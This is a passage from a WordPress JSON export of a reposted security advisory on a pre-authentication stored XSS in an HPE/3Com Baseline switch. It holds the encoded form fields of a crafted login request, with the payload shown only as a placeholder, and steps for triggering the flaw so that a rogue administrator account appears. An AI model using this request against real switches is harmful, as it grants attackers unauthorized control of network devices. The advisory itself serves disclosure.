class=\"crayon-cn\">3D0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BRange0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5B<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2147483648<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2C2147483647<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5D<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">rlPhdModuleIndex<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24VT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BAccess<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BNumOfEnumerations<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BRange0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5B<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2147483648<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2C2147483647<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5D<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">rlPhdModuleType<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24VT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BAccess<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D1<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BNumOfEnumerations<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3BRange0<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5B<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2147483648<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2C2147483647<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">5D<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ModuleTable<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24endVT<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">OK<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">userName<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24query<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&lt;===== PAYLOAD ======&gt;&#8221;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">24query<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">asd<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>Now we can login to the target switch and we verify the user list in Administration > System Access.<\/p>\n<p>Then we trigger the vulnerability by going in to the logs page (Administration > Logging).<\/p>\n<p>We can re-verify the user list and see that a new administrator user named &#8220;SSD_USER&#8221; has been added.<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3389\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-300x105.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 18 Oct 2017 05:42:41 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an unauthenticated stored XSS in the HPE Baseline Smart Gig SFP 24 \/ 3Com Baseline Switch 2924 SFP Plus Switch. The vulnerability affect versions: Software Version: 01.00.10 Boot version: 1.0.0.14 Hardware Version: 01.01.0a &#8220;On April 12, 2010, Hewlett-Packard completed the acquisition of 3Com. Since the acquisition, 3Com has been &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3389\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 HPE Baseline Smart Gig SFP 24 Switch Pre-authentication Stored XSS<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11640,10757,12136],"class_list":["post-9966","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-cross-site-scripting","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9966","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9966"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9966\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9966"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}